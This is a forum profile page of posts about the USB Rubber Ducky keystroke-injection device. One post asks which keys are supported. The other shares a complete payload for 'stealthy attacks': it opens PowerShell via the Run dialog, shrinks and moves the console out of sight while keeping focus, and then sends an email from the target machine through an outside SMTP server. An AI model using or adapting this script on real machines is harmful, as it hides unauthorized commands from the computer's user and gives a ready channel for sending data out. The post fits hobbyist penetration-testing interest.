desert33
-
Posts
2 -
Joined
-
Last visited
Posts posted by desert33
-
-
Is there a complete list of all encode-able keys? I found a list of commands at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/My-first-payload#command-breakdown, but it ends with out explicitly stating with key combos are or aren't supported.
Specifically, is the Fn key or other laptop specific keys supported?
Thanks!
Hide PowerShell Console with Focus
in Classic USB Rubber Ducky
Posted
I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears.
Here are the commands for the basic idea:
I found that shrinking the console size is faster than moving the console, so I played around with doing both several times to try and make the console disappear faster. To make sure the Ducky still had focus and was running, I had it send me an email.
Here is my test script that uses this hiding technique:
REM Author: desert33 REM Name: hidePS.txt REM Purpose: Try to Hide PowerShell for a more stealthy approach. REM Encoder V2.4 REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Open powershell *** GUI r DELAY 250 STRING powershell ENTER DELAY 400 REM *** Hide PowerShell *** STRING [console]::WindowHeight=10 ENTER STRING [console]::WindowWidth=10 ENTER ALT SPACE STRING m LEFTARROW REPEAT 30 STRING [console]::WindowHeight=5 ENTER STRING [console]::WindowWidth=5 ENTER ALT SPACE STRING m LEFTARROW REPEAT 10 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER REM *** Send an email to prove Ducky is working *** STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'from@email.com' ENTER STRING $ReportEmail.To.Add('to@email.com') ENTER STRING $ReportEmail.Subject = 'Hello' ENTER STRING $ReportEmail.Body = '"You got Ducked. Better luck next time." -desert33' ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM *** Exit *** STRING EXIT ENTER